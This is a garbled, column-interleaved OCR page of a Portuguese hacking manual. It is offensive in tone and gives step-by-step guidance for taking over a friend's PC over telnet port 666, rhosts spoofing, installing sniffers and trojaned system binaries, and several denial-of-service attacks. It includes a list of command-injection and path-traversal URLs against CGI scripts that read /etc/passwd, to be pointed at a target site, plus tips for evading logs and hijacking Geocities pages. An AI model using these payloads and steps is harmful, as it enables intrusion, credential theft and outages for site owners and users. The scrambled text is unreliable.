You are on page 1of 13

Manual do Hacker completo - passo a passo ENDEREÇO IP.

ENTÃO PODEMOS EXECUTAR COMANDOS


REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES
HOSTS "CONFIÁVEIS" ESTEJAM LISTADOS NO RHOSTS,
=====INVASÃO PELA PORTA 666=====
SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTAR
NOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV.
MAS O QUE É ISSO?
NESTE CASO, QUALQUER USUÁRIO DAS MÁQUINAS
LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM
UMA PASSWORD.
É UMA PORTA QUE SÓ PODERIA SER USADA PELO
GOVERNO AMERICANO E NASA, TANTO QUE ELES
THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA
COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE
MENSAGEM A UM OUTRO HOST ESTE PODE SER DIVIDIDO
CONECTAR POR ELA NÃO É NADA FÁCIL, MAS PRECISA DE
EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO
ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR
HOST DESTINO POR TCP. O IP SOMENTE SE
COISAS NA CASA DE UM AMIGO SEM ELE FICAR SABENDO.
ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃO EM
UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR,
O QUE VOCÊ PRECISA:
DEVE CONHECER A O IP DA MÁQUINA-DESTINO E Ó
NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E
VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT
DECIDIR ENTÃO A CONEXÃO DESTINO. (CONEXÃO-
(www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE
DESTINO=DIREÇÃO IP+PORTA TCP).
PROGRAMA. VOCÊ PRECISA DE UM PROGRAMA PARA
ACESSAR TELNET. PARA QUEM NÃO SABE ESTE
PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM
PROGRAMA FICA NO DIRETÓRIO WINDOWS. PRONTO? JÁ
PROCEDIMENTO DENOMINADO "3-WAY HANDSHAKE".
TENHO TUDO AGORA? AGORA É SÓ CHAMAR UM AMIGO
NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK)
PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE
SÃO REQUERIDAS PARA ESTABELECER A CONEXÃO.
TAMBÉM DEVE TER AS DUAS FERRAMENTAS. DEPOIS DE
ENTRE A INFORMAÇÃO INTERCAMBIADA ESTÁ A DIREÇÃO
CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT.
DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL
DEPOIS, É SÓ ABRIR O TELNET E NO HOST COLOCAR O IP
(#SI) QUE AMBAS UTILIZARÃO PARA ESTABELECER A
DINÂMICO DA VÍTIMA E SE CONECTAR A PORTA 666 E NO
COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARA
LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE
A COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE
PERMANECER. PRONTO! AGORA VOCÊ ESTARÁ EM UM
BASEIAM NA HORA DO RELÓGIO INTERNO DO SISTEMA.
PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTAL
UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ
CONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE
"AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS.
PODE CHEGAR A DAR UM FORMAT C: , POR ISSO, SÓ FAÇA
ISSO COM SEUS AMIGOS.
=====ATAQUE POR MONITORAÇÃO=====
ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM
=====SPOOFING=====
SOFTWARE DE MONITORAÇÃO DE REDE CONHECIDO
PARA QUE VOCÊ COMPREENDA ESTE TEXTO É
COMO SNIFFER, INSTALADO PELOS INVASORES. O
NECESSÁRIO QUE VOCÊ TENHA ALGUNS
SNIFFER GRAVA OS PRIMEIROS 128 BYTES DE CADA
CONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP.
SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELE
SEGMENTO DE REDE LOCAL COMPROMETENDO TODO O
ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E
TRÁFEGO DE/PARA QUALQUER MÁQUINA NAQUELE
SIM PARTE DE UM. LOGO, O SPOOFING É UMA ESPÉCIE DE
SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR
TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE
AQUELE SEGMENTO. OS NOMES CAPTURADOS INCLUEM O
MASCARAR SEU ENDEREÇO IP OU DNS, POR EXEMPLO,
HOST DESTINO, O USERNAME E A PASSWORD. A
DIZENDO AO SISTEMA QUE ELE VAI ATACAR, QUE ELE É
INFORMAÇÃO É GRAVADA NUM ARQUIVO
CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES
POSTERIORMENTE RECUPERADO PELO INVASOR PARA
ENTRE COMPUTADORES NA INTERNET SE BASEIA NESTES
TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS
ENDEREÇOS "CONFIÁVEIS" PARA TROCAREM
INVASORES OBTEM ACESSO INICIAL AOS SISTEMAS
INFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA
USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM O
COMUNICAÇÃO COM UMA MÁQUINA B SEM QUE SEJA
ARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS
NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO É
IMPROPRIAMENTE CONFIGURADOS; OBTEM O ARQUIVO
AUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA
DE PASSWORDS DE SISTEMAS RODANDO VERSÕES
ESPÉCIE DE DISFARCE EM SEU PC, DIZENDO PARA A
INSEGURAS DO NIS; OBTEM ACESSO AO SISTEMA DE
MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A
ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARA
VAI ACEITAR TODOS OS SEUS COMANDOS E, ENTÃO, O
MONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME
CARA PODE FAZER TUDO O QUE QUISER NELA. OS TIPOS
DE LOGIN E PASSWORD CAPTURADA POR UM SNIFFER
MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-
RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OS
SPOOFING, WEB-SPOOFING, E-MAIL-SPOOFING ENTRE
INVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO
OUTROS.
VULNERABILIDADES CONHECIDAS, TAÇ COMO RDISTSUN
SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS
COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING
DE ESCRITA POR TODO MUNDO OU USANDO UMA
O INVASOR TOMA A IDENTIDADE DE HOST CONFIÁVEL. EM
PASSWORD DE ROOT CAPTURADA. ELES ENTÃO INSTALAM
UMA REDE UNIX PODEMOS CONFIGURAR HOSTS
O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO
CONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU
CAPTURADA NUM ARQUIVO INVISÍVEL.
DIRETORIO/HOME UM ARQUIVO CHAMADO RHOSTS COM
OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE
ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM
TENHA O USER ID QUE VOCÊ COLOCOU NESTE ARQUIVO
SUBSTITUIÇÃO E UMA OU MAIS DENTRE OS SEGUINTES
PODE LOGAR-SE NA SUA CONTA USANDO O RLOGIN.
ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA:
O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE
/BIN/LOGIN
/SERVIDOR SIMPLES, QUE USA O TCP COMO PROTOCOLO
DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO
/USR/ETC/IN.TELNETD
LOGAR-SE REMOTAMENTE DE UM HOST AO OUTRO. SE A
MÁQUINA ALVO CONFIAR NA MÁQUINA DESTE USUÁRIO, O
/USR/KVM/PS
RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR
PASSWORD. ELA SOMENTE IRÁ AUTETICAR O CLIENTE VIA
/USR/UCB/NETSTAT
CLASSIFICADO COMO UM ATAQUE DE DoS, POIS ELE
ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE
ELE CHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO
ENTENDA O BARRAMENTO DO MICRO EXEMPLO É O WINNUKE, QUE ATACA UM DRIVER DO
TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO
ISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA DO CARA ATÉ RESETAR O MICRO DO SUJEITO. ASSIM, O
ORIGINAIS ERAM DE 8 BITS E RODAVAM A 4,77 MHZ. COM O DoS SURGE COMO UM NOVO CAMPO A SER EXPLORADO,
ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA
A 8 MHZ., UTILIZADOS ATÉ HOJE. MAS SIM FRAQUEZAS NA MANEIRA COM QUE OS
PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM
POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE
ISA DE 8 BITS. VOCÊ AINDA NÃO TOMOU UMA NOÇÃO CLARA DO QUE
SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A
OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA, ENTENDER.
VESA E PCI, ESSES DOIS ÚLTIMOS SÃO O QUE SE CHAMA
DE LOCAL BUS. WINNUKE

SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM OS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT
CONEXÃO DIRETA COM A CPU. 4.0.

VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA,
UM BARRAMENTO NOVO, ELE É BASICAMENTE UM ISA PENSOU EM COMO SERIA A IMPLANTAÇÃO DO
ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS E COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE
FREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A UM PROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE
VELOCIDADE DE TRANSMISSÃO É DE 130MBITS/S. ALGO PRÁTICO, CONSTANTE E SEM

=====ROUBANDO SENHAS DE SITES===== DIFICULDADES PARA O USUÁRIO FINAL. POR ISSO,


ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES RESERVOU AO NETBIOS A PORTA TCP/IP 139 E DEIXOU
RESTRITOS QUE NECESSITAM DE SENHA PARA ENTRAR. ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT.
(NÃO FUNCIONA EM TODOS) ACONTECE QUE ACABARAM DESCOBRINDO QUE ERA
POSSÍVEL FAZER UM ATAQUE DE DoS BEM INTERESSANTE
phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM
php.cgi http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi MANDAR UMA MENSAGEM OOB (OUT OF BAND) PARA ESSA
http://xxx.xxx.xxx/cgi-bin/test-cgi?/etc/* query PORTA E COMO O RWINDOWS NÃO SABE LIDAR COM ESSE
http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO
faxsurvey http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat SEU RWINDOWS, FAZENDO APARECER PORTANTO, A
%20/etc/passwd htmlscript http://xxx.xxx.xxx/cgi- FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DE
bin/htmlscript?../../../../etc/passwd webdist.cgi DRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA
http://xxx.xxx.xxx/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd PESSOA PELA PORTA 139, ISSO PODE SER FEITO POR
nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-test-cgi?/etc/* echo OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135
http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view- E 137), DESDE QUE ESTEJAM "ESCUTANDO".
source http://xxx.xxx.xxx/cgi-bin/view-
source?../../../../../etc/passwd pfdisplay http://xxx.xxx.xxx/cgi- LAND
bin/pfdispaly.cgi?/../../../../etc/passwd campas
http://xxx.xxx.xxx/cgi-bin/campas?%0acat%0a/etc/passwd%0a OS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E
wrap http://xxx.xxx.xxx/cgi-bin/wrap?/../../../../../etc whatever BSDI 2.1 E OUTROS
http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat /etc/passwd|?
data=Download xenolith http://xxx.xxx.xxx/cgi- ENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO
bin/handler/xenolith;cat /etc/passwd/| ?data=Download KERNEL 2.0.30

Substitua o xxx.xxx.xxx pelo endereço do site ESSE ATAQUE USA UM MECANISMO INTERESSANTE,
PORÉM NÃO CAUSA DANOS CONSIDERÁVEIS, SÓ
DoS CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS
PARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR INSTANTES. É O SEGUINTE: VOCÊ MANDA VÁRIOS
DO QUE EXPLICAR O QUE É ISSO. O LAMMER VEM E DIZ: " PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COM
EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL O IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP
CRIADU PELU BIU GAYTIS, PAI DU MERCADU DI RESPNSÁVEL POR INICIAR UMA CONEXÃO TCP/IP,
SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKING NÃO CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO
SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE RECEBER UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE
NEM SEI SE CHEGA A INCLUIR TAMANHA BOSTA. ASSIM, IMEDIATAMENTE COM UM PACOTE COM AS FLAGS SYN E
DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOS ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN
QUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER REQUESTS ESTÃO SPOOFADAS COM O IP DO PRÓPRIO
"DENIAL OF SERVICE". DoS É UM ATAQUE MUITO ÚTIL, E ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´S PARA
COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO
TIPO DE SERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE SISTEMA E CHEGANDO ATÉ A TRAVÁ-LO EM ALGUMAS
ACESSEM UM DETEMINADO SERVOÇO DO HOST. VARIAÇÕES. SIMPLES E EFICIENTE.

PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS TEARDROP


BAIXO LAYERDO TCP/IP ATÉ STACK ATÉ O LAYER DE
APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO. AS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUX
COMO VEREMOS AQUI, NÃO EXISTE UM ATAQUE DE DoS, E
SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SER ESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA
CONSIDERADOS COMO DoS, CADA UM DELES ATACANDO UM BUG PRESENTE NO LAYER IP (RELACIONADO À
UMA PARTE DO TCP/IP E DOS SEUS SUBPROTOCOLOS. FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK
DOS DIFERENTES OS´S CITADOS ACIMA. QUANDO A VÍTIMA
A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER RECEBE DETERMINADOS DADOS, SEU SISTEMA PODE
CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO
CASO DE SISTEMAS WINDOWS PODE ATÉ SER QUE PARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO
APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UM PRESENTE EM SISTEMA MULTIUSUÁRIO (ESPECIALMENTE
ERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NO
DANOS E UM SIMPLES REBOOT IRÁ NORMALIZAR TUDO. SISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO
UTILIZANDO, TEMPO QUE ESTÃO LOGADOS, ETC. É BEM
VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA
ROOTSHELL (HTTP://WWW.ROOTSHELL.COM). É SÓ DAR HACKEADA, MAS NÃO É DISSO QUE ESTAMOS FALANDO
UM SEARCH. AGORA.

SSPING/JOLT O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA


REQUEST-ANSWER. ASSIM, VOCÊ FAZ UM FINGER
OS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE
ANTIGAS VERSÕES DE MAC’OS. RESPONDE, DE ACORDO COM A REQUEST QUE FOI FEITA.

ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO
SISTEMAS WINDOWS COM O PROTOCOLO ICMP, E MAIS SISTEMA VOCÊ DÁ O COMANDO FINGER@SISTEMA
ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING .COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS
FAZ É QUE ELE CRIA PACOTES DE DADOS ICMP MUITO LOGADOS.
GRANDES (MAIS QUE O PERMITIDO), OS FRAGMENTA EM
VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE SE QUISER SABER INFORMAÇÕES SOBRE UM
UMA VEZ SÓ PARA O ALVO. QUANDO O ALVO PEGA ESSES DETERMINADO USUÁRIO VOCÊ DÁ O COMANDO FINGER
FRAGMENTOS E TENTA REMONTAR OS PACOTES USUÁRIO@SISTEMA.COM.BR.
ORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO.
O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS
BONK/BOINK RAPIDAMENTE PARA O ALVO.
USUÁRIO@@@@@@@@@@SISTEMA.COM.BR.
OS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0.
CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST
ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO E LOGO ASSIM, O COMPUTADOR DA VÍTIMA SOFRERÁ UM
CONHECIDO TEARDROP. O BONK SERIA UM TEARDROP FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO.
QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK (NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO
É UMA VERSÃO MAIS AVANÇADA DO BONK E PERMITE QUE POR ESTE ATAQUE).
PORTAS UDP SEJAM USADAS COMO ALVO. ESSES FATOS
SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O
SE RECEBER MUITOS PACOTES UDP CORROMPIDOS. SUFICIENTE EM SEU CÉREBRO PERCEBEU QUE O WIN 95 E
ASSIM O PROGRAMA MANDA VÁRIOS DATAGRAMAS IP NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES
FRAGMENTADOS E NO COMPUTADOR ALVO SÃO LISTADOS AQUI. E NÃO PENSE QUE ESSES SÃO TODOS,
REMONTADOS EM PACOTES UDP INVÁLIDOS ATRAVÉS DO POIS EXISTEM MUITOS OUTROS QUE ESTÃO SENDO
"OVERLAPPING BUG", TAMBÉM MUITO EXPLORADO NO CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ
TEARDROP. MENCIONEI ANTES, UM CAMPO A SER EXPLORADO PELOS
HACKERS.
SMURF
SNIFFER
OS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T- O SEGUINTE DOCUMENTO VISA AUXILIAR
O-D-O-S! ADMINISTRADORES A COMPREENDER PROBLEMAS
RELACIONADOS COM SNIFFING E AS POSSÍVEIS
AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS SOLUÇÕES. A AÇÃO DOS SNIFFERS É ATUALMENTE UM
ATAQUES MAIS EFICIENTES E LOUCOS. O SMURF! A DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA.
SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR
QUANDO SE OBSERVA OS DANOS QUE PODEM SER O QUE É O SNIFFER E COMO ELE FUNCIONA?
CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI,
ESSE É O PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS COMPUTADORES EM REDE COMPARTILHAM CANAIS DE
COMPUTADORES: O INVASOR E A VÍTIMA, MAIS SIM COMUNICAÇÃO. ISSO É OBVIAMENTE MUITO MAIS BARATO
CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS DO QUE PASSAR UM CABO EM CADA PAR DE
UM SÓ!! DEVASTADOR!! COMPUTADORES PARA FAZER AS CONEXÕES. NESTES
CANAIS COMPARTILHADOS, COMPUTADORES PODEM
O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST RECEBER INFORMAÇÕES ENVIADAS A OUTROS
DE PACOTES ICMP (MANDA PARA VÁRIOS ENDEREÇOS, COMPUTADORES. A AÇÃO DE CAPTURAR INFORMAÇÕES
CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ DESTINADAS A OUTROS COMPUTADORES É CHAMADA
QUE COM O ENDEREÇO DE ORIGEM SPOOFADO COM O IP SNIFFING.
DA VÍTIMA. ASSIM, TODOS OS COMPUTADORES QUE
FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS
ESSE COMPUTADOR VÍTIMA. MÁQUINAS EM UM MESMO SEGMENTO. O CABEÇALHO DO
PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO.
POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000 SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O
COMPUTADORES E ESSE PING TEM COMO IP DE ORIGEM O ENDEREÇO CONTIDO NO PACOTE RECEBA-O. DIZ-SE QUE
IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO O
NADA MENOS DO QUE 1000 PACOTES ICMP DE MESMO CAPTURA TODOS OS PACOTES,
RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSO INDEPENDENTEMENTE DE SEREM OU NÃO DESTINADOS A
SIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA ELE.
ELE TOTALMENTE, TENDO QUE SER REINICIADO.
EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS
FINGER DoS SENHAS DOS USUÁRIOS SÃO PASSADAS ATRAVÉS DA
REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO.
OS QUE ESTÃO RODANDO FINGER UNPATCHEADO NÃO É DIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA
MÁQUINA COM INTERFACE DE REDE EM MODO PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS
PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO DRIVERS CLIENTES DA MICROSOFT. CASO NÃO ESTEJA,
ROOT, UTILIZANDO UM SNIFFER. INSTALE-OS ATRAVÉS DO PAINEL DE CONTROLE NO ÍCONE
REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DE
DICAS DE ÉTICA HACKER ARQUIVOS E IMPRESSORAS ESTÁ INSTALADO.
DESCOBRIU ALGO NOVO, OLHE.
NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL
ACESSO A PROVEDOR OU DETONÁ-LO? DE CONTROLE E ABRA REDE. VERIFIQUE AS
NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A
QUE ESTEVE LÁ. OPÇÃO PARA ATIVAR A RESOLUÇÃO WINS. NO CASO DE
NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO. VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS,
NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL 204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO
USANDO ACESSO DOS OUTROS. SECUNDÁRIO. ESSES SERVIDORES SÃO SO USA E
NUNCA SUBESTIME UM SYSOP. GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE
ESCOLHA HORAS ENTRE 0:30 E 6:00. UM DOS MECANISMOS DE BUSCA DA INTERNET. PARA
UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM CONFIGURAR O LMHOSTS VOCÊ PRECISA CRIAR UM
CAUTELA. ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS.
NÃO COFIE EM NINGUÉM. NESSE ARQUIVO É ONDE FICARÃO OS ENDEREÇOS DE IP
SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE E OS NOMES DOS COMPTADORES ACESSADOS. PARA
ACESSO E NÃO SABE O QUE FAZER, MATE-SE! LOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O
NÃO TESTE VÍRUS NO PRÓPRIO HD. SEU NÚMERO DE IP E A SEGUIR SEU NETBIOS, NA MESMA
É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR
DE ATACAR. O PROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E
USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS O IP DE SEU COMPUTADOR, SEMPRE SENDO O PRIMEIRO
SEGURO) DA LISTA, SEGUIDO DAS OUTRAS MÁQUINAS
NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE DISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO
VOCÊ PEGOU. EXPLORER VOCÊ PODERÁ VER OS COMPUTADORES
NÃO TENHA PENA DE NINGUÉM. DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ
VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO UTILIZAR OS DISCOS MAPEANDO-OS, O QUE OS TORNARÁ
CONTE A NINGUÉM... UNIDADES DE SEU COMPUTADOR.
NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA.
APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS! COMO HACKEAR UMA PÁGINA DA GEOCITES?
NÃO SE META A BESTA DIRETO! É A COISA MAIS FÁCIL DO MUNDO...

MAIS DICAS ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI


CONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO PORQUE ATÉ HOJE NÃO OUVI FALAR DE NINGUÉM QUE
O WINDOWS, LINUX E UNIX, WINDOWS NT. COM ELES É TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS
QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA DIRETO AO ASSUNTO:
OU ENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS
DIFÍCIL, MAIS NÃO IMPOSSÍVEL. ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE.
ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO:
APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE
VISUAL BASIC OU C. VOCÊ ESCREVENDO PEQUENOS VOCÊ SÓ VAI ANOTAR O DIRETÓRIO E O BLOCK.
PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E
EM PARALELO PARA DESCOBRIR SENHAS DE ACESSO. CLIQUE NO LINK CONTACT GEOCITES, DEPOIS CLIQUE EM
SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS
APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE REPORTING FORM. LÁ VOCÊ VAI COLOCAR AS
